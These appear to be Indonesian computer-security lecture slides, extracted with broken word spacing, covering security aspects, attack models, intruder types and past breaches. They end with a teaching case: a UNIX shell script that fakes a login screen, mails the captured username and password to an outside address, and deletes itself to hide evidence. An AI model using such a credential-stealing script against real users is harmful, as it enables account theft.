Pe nda hulua n
Ke am anan kom pute r
Keamanan komputer adalah suatu cabang teknologi yang dikenal dengan nama
keamanan infor masi yang diterapkan pada komputer. Sasaran keamanan komputer antara lain adalah sebagai perlindungan infor masi terhadapencur ian atau kor upsi, atau pemeliharaan keter sediaan, seper ti dijabarkan dalam kebijakan keamanan
Keamanan komputer memberikan per syaratan terhadap komputer yang berbeda dari
kebanyakan persyaratan sistem karena ser ing kali berbentuk pembatasan terhadap apa
yang tidak boleh dilakukan komputer. Ini membuat keamanan komputer p menjadi
lebih menantang karena sudah cukup sulit untuk membuat program komputer
Ke am anan kom pute r
Pendekatan yang umum dilakukan untuk meningkatkan keamanan komputer antara lain
adalah dengan membatasi akses fisik terhadap komputer, menerapkan mekanisme pada
M e ngapa Ke am anan Kom pute r dibutuhkan ? ? ?
Keamanan komputer di perlukan untuk menjamin sumber
daya agar tidak digunakan atau dimodifikasi oleh orang yang tidak berhak.
M e ngapa Ke am anan Kom pute r dibutuhkan ? ? ?
“Informati on- based Soci ety” : menyebabkan nilai infor masi
menjadi sangat penting dan menuntut kemampuan untuk mengakses dan menyediakan infor masi secara cepat dan akurat menjadi sangat esensial bagi sebuah organisasi
3 Ke lom pok Ke am anan S is te m
Keamanan Ekter nal / external securi ty
Ke am anan Eks te rnal
Keamanan yang berkaitan dengan fasilitas-fasilitas
komputer dar i penyusup dan bencana alam seper ti
Ke am anan Inte rface Pe m akai
Keamanan yang berkaitan dengan identifikasi pemakai
sebelum pemakai diijinkan mengakses program dan data
yang disimpan, contohnya penggunaan password sehingga
Ke am anan Inte rnal
Keamanan yang berkaitan dengan keamanan beragam
kendali yang dibangun pada perangkat keras (hardware) dan
As pe k Ke am anan Kom pute r
Me nurut Garfinke l [Sim s o n Garfinke l, “PGP: Pre tty Go o d Privacy,” O’ Re illy & As s o c i-ate s , Inc ., 1 9 9 5 . ]
Privacy / Confidentiality
Defenisi : menjaga infor masi dari orang yang tidak berhak mengakses.
Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail seorang pemakai (user) tidak boleh dibaca oleh administrator.
Confidentiality : berhubungan dengan data yang diberikan ke pihak lain untuk keperluan ter tentu dan hanya diperbolehkan untuk keperluan ter tentu tersebut.
Contoh : data-data yang sifatnya pribadi (seper ti nama, tempat tanggal lahir, social security number, agama, status perkawinan, penyakit yang per nah
diderita, nomor kar tu kredit, dan sebagainya) har us dapat diproteksi dalam penggunaan dan penyebarannya.
Bentuk Serangan : usaha penyadapan (dengan program sni ffer).
I ntegrity
Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.
Contoh : e-mail di intercept di tengah jalan, diubah isinya,
kemudian diteruskan ke alamat yang dituju.
Bentuk serangan : Adanya virus, troj an horse, atau pemakai lain
yang mengubah informasi tanpa ijin, “man in the middle attack” dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain.
As pe k Ke am anan Kom pute r
Authentication
Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang mengakses atau memberikan informasi
adalah betul-betul orang yang dimaksud.
Dukungan :
AdanyaTools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi watermarking(untuk menjaga“i ntel l ectual property”, yaitu dengan menandai dokumen atau hasil karya
dengan “tanda tangan” pembuat ) dan digital signature.
Access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. User harus menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya.
As pe k Ke am anan Kom pute r
Availability
Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan.
Contoh hambatan :
“deni al of servi ce attack” (DoSattack), dimana ser ver dikirimi
permintaan (biasanyapalsu) yang ber tubi-tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang, crash.
mai l bomb, dimana seorang pemakai dikirimi e-mail ber tubi-tubi
(katakan ribuan e-mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e-mailnya atau kesulitan
mengakses e-mailnya.
As pe k Ke am anan Kom pute r
Access Control
Defenisi : cara pengaturan akses kepada informasi. berhubungan dengan masalah
authentication dan juga privacy
Metode : menggunakan kombinasi userid/ password atau dengan
menggunakan mekanisme lain.
Non-repudiation
Defenisi : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Dukungan bagi electronic commerce
As pe k Ke am anan Kom pute r
tanda tangan (signature(en)), mengesahkan suatu infor masi menjadi satu kesatuan di bawah suatu otor itas;
otor isasi (author ization(en)), pember ian hak/ kewenangan kepada entitas lain di dalam sistem;
validasi (validation(en)), pengecekan keabsahan suatu otor isasi;
kontrol akses(access control(en)), pembatasan akses terhadap entitas di dalam sistem;
ser tifikasi (cer tification(en)), pengesahan/ pember ian kuasa suatu infor masi kepada entitas yang ter percaya;
pencatatan waktu (timestamping(en)), mencatat waktu pembuatan atau keberadaan suatu infor masi di dalam sistem;
per saksian (witnessing(en)), memver ifikasi pembuatan dan keberadaan suatu infor masi di dalam sistem bukan oleh pembuatnya
As pe k Ke am anan Kom pute r
tanda ter ima(receipt(en)), pember itahuan bahwa infor masi telah diter ima;
konfir masi (confir mation(en)), pember itahuan bahwa suatu layanan infor masi telah ter sedia;
kepemilikan (owner ship(en)), menyediakan suatu entitas dengan sah untuk menggunakan atau mengir imkan kepada pihak lain;
anonimitas(anonimity), menyamarkan identitas dar i entitas terkait dalam suatu proses transaksi;
nir penyangkalan (non-repudiation(en)), mencegah penyangkalan dar i suatu entitas atas kesepakatan atau perbuatan yang sudah dibuat;
penar ikan (revocation(en)), penar ikan kembali suatu ser tifikat atau otor itas.
As pe k Ke am anan Kom pute r
Ke butuhan akan s e buah ke am anan
Kerahasiaan (secrecy) adalah
keterjaminan sistem hanya dapat
diakses oleh pihak yang berhak.
Integr itas (integrity) adalah sistem hanya dapat dimodifikasi oleh pihak yang berhak.
S e curity Attack M ode ls
I nterruption: Perangkat sistem menjadi r usak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (avai l abi l i ty)
dari sistem. Contoh serangan adalah “denial of service attack”.
S e curity Attack M ode ls
I nterception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping). Ancaman terhadap aspek kerahasiaan,
S e curity Attack M ode ls
Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang mer ugikan pemilik web site.
Ancaman terhadap aspek integritas, di mana sistem selain dapat diakses oleh orang yang tidak berhak tetapi juga dapat mer usak sumber daya (memodifikasi). Contohnya mengubah nilai file data, mengubah program sehingga ber tindak
S e curity Attack M ode ls
Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seper ti e-mail palsu ke dalam jaringan komputer.
ancaman terhadap integritas, yaitu pihak yang tidak berhak dapat menyisipkan / memasukkan objek palsu ke dalam sistem. Contohnya memasukkan pesan palsu dan penambahan record ke file
Ke jahatan Kom pute r m e ningkat kare na :
Aplikasi bisnis berbasis TI dan jar ingan komputer
meningkat : online banking, e-commerce, Electronic data Interchange (EDI)
Desentralisasi ser ver.
Transisi dar i single vendor ke multi vendor.
Meningkatnya kemampuan pemakai (user).
Kesulitan penegak hukum dan belum adanya ketentuan
yang pasti.
Semakin kompleksnya system yang digunakan, semakin
besar nya source code program yang digunakan.
Klas ifikas i Ke jahatan Kom pute r
Keamanan yang bersifat fisik (physical security): termasuk akses
orang ke gedung, peralatan, dan media yang digunakan. Contoh :
Wiretapping, atau hal-hal yang ber-hubungan dengan akses ke kabel atau komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini
D enial of service, dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang diuta-makan adalah banyaknya jumlah pesan)
Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh
Klas ifikas i Ke jahatan Kom pute r
Keamanan yang berhubungan dengan orang (per sonel)
Identifikasi user (user name dan password)
Profil resiko dar i orang yang mempunyai akses (pemakai dan pengelola).
Keamanan dar i data dan media ser ta teknik komunikasi
Keamanan dalam operasi : Adanya prosedur yang
digunakan untuk mengatur dan mengelola sistem
keamanan, dan juga ter-masuk prosedur setelah serangan
Karakte ris tik Pe nyus up
The Curious (Si I ngin Tahu)
- tipe penyusup ini pada dasar nya ter tar ik menemukan jenis sistem dan data yang anda miliki.Karakte ris tik Pe nyus up
The H igh-Profile I ntruder (Si Profil Tinggi)
- tipe penyusup ini ber usaha menggunakan sistem anda untuk memperoleh popular itas dan ketenaran. Dia mungkinmenggunakan sistem profil tinggi anda untuk
mengiklankan kemampuannya.
Is tilah bagi pe nyus up
M undane
; tahu mengenai hacking tapi tidakmengetahui metode dan prosesnya.
lamer (script kiddies)
; mencoba scr ipt2 yang per nah di buat oleh aktivis hacking, tapi tidak paham bagaimana cara membuatnya.
wannabe
; paham sedikit metode hacking, dan sudah mulai berhasil menerobos sehingga berfalsafah ; HACK IS MY RELIGION.Is tilah bagi pe nyus up
hacker
; aktivitas hacking sebagai profesi.
wizard
; hacker yang membuat komunitas pembelajaran di antara mereka.S e curity Bre ach Accide nt
1996 U.S. Federal Computer Inci dent Response Capabi l i ty
(FedCIRC) melaporkan bahwa lebih dar i 2500 “insiden” di system komputer atau jar ingan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan
1996, FBI N ati onal Computer Cri mes Squad, Washington
S e curity Bre ach Accide nt
1996 Inggr is, N CC Informati on Securi ty Breaches Survey
menunjukkan bahwa kejahatan komputer menaik 200% dar i tahun 1995 ke 1996. Ker ugian rata-rata US $30.000 / insiden
1997 Penelitian Del oi tte Touch Tohmatsu menunjukkan bahwa
S e curity Bre ach Accide nt
1998 FBI melaporkan bahwa kasus per sidangan yang
berhubungan dengan kejahatan komputer meroket 950% dar i tahun 1996 ke tahun 1997, dengan penangkapan dar i 4 ke 42, dan terbukti (convi cted) di pengadilan naik 88%
dar i 16 ke 30 kasus
Contoh Akibat Je bolnya S is te m Ke am anan :
1988, Keamanan sistem mail sendmai l dieksploitasi oleh
Rober t Tapan Mor r is sehingga melumpuhkan sistem
Inter net. Kegiatan ini dapat diklasifikasikan sebagai “deni al of servi ce attack”. Diperkirakan biaya yang digunakan untuk
memperbaiki dan hal-hal lain yang hilang adalah sekitar
Contoh Akibat Je bolnya S is te m Ke am anan :
10 Maret 1997, Seorang hacker dar i Massachusetts berhasil mematikan sistem telekomunikasi di sebuah air por t local (Worcester, Massachusetts) sehingga mematikan
komunikasi di control tower dan menghalau pesawat yang hendak mendarat. Dia juga mengacaukan sistem telepon di Rutland, Massachusetts.
Contoh Akibat Je bolnya S is te m Ke am anan :
1990, Kevin Poulsen mengambil alih system komputer
telekomunikasi di Los Angeles untuk memenangkan kuis di sebuah radio local
1995, Kevin Mitnick, mencur i 20.000 nomor kar tu kredit,
menyalin system operasi DEC secara illegal dan
mengambil alih hubungan telpon di New York dan Califor nia
1995, Vladimir Levin membobol bank-bank di kawasan
Contoh Akibat Je bolnya S is te m Ke am anan :
2000, Fabian Clone menjebol situs aetna.co.id dan Jakar ta
mail dan membuat directory atas namanya ber isi
per ingatan terhadap administrator situs ter sebut
2000, Beberapa web site Indonesia sudah dijebol dan daftar nya (beser ta contoh halaman yang sudah dijebol) dapat dilihat di koleksi http:/ / www.2600.com
M e m aham i Hacke r Be ke rja
Secara umum melalui tahapan-tahapan sebagai ber ikut :
Tahap mencar i tahu system komputer sasaran.
Tahap penyusupan
Tahap penjelajahan
Contoh kas us Trojan Hous e , m e m anfaatkan
SHELL s cript UNIX
Seorang gadi s canti k dan geni t peser ta kul i ah UN IX di sebuah perguruan ti nggi memi l iki potensi memanci ng pengelol a si stem komputer (admi ni strator pemegang account root . . . hmmm) yang l engah. Ia mel aporkan bahwa komputer tempat i a mel akukan tugas- tugas UN IX yang
di berikan ti dak dapat di pergunakan. Sang pengel ol a si stem komputer tentu saj a dengan gagah
perkasa i ngi n menunj ukkan kekuasaan sebagai admi ni strator UN IX
" Wel l, i ni soal keci l. Mungki n password kamu ke blokir, bi ar saya perbai ki dari tempat kamu" , uj ar admi ni strator UN IX sombong sambi l duduk di sebel ah gadi s canti k dan geni t peser ta kul i ah
tersebut
Keesokan hari nya, terj adi l ah kekacauan di si stem UN IX karena di duga terj adi penyusupan ol eh hacker termasuk j uga hompepage perguruan ti nggi tersebut di -obok- obok, makl um pengel ol anya
masi h sama. Sel anj utnya pi hak perguruan ti nggi mengel uarkan press rel ease bahwa homepage
Contoh kas us Trojan Hous e , m e m anfaatkan
SHELL s cript UNIX Nah sebenarnyaapasih yang terjadi ?
Sederhana, gadiscantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
# !/ bin/ sh
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
let COUNTER= $COIUNTER+ 1
echo " login: \ c"
read LOGIN
stty echo
echo " password: \ c"
read PASSW ORD
echo " User $LOGIN : $PASSW ORD" | mail gadis@company.com
stty echo
echo
echo " Login Incorrect"
done
rm $0
Contoh kas us Trojan Hous e , m e m anfaatkan
SHELL s cript UNIX
Apabila program ini dijalankan maka akan ditampilkan layar login seper ti layaknya awal penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak
Contoh kas us Trojan Hous e , m e m anfaatkan
SHELL s cript UNIX
Seper ti pada program login sesungguhnya, sistem komputer akan meminta
pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: * * * * * * * *
Login Incorrect
Tentu sajaAdministrator UNIX akan kaget bahwa passwordnya ter nyata
(seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan
Contoh kas us Trojan Hous e , m e m anfaatkan
SHELL s cript UNIX
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ter nyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu
r m $0
Contoh kas us Trojan Hous e , m e m anfaatkan
SHELL s cript UNIX
yang ar tinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peser ta kuliahnya.
Daftar Pus taka
http:/ / id.wikipedia.org/ wiki/ Keamanan_komputer
www.cer t.org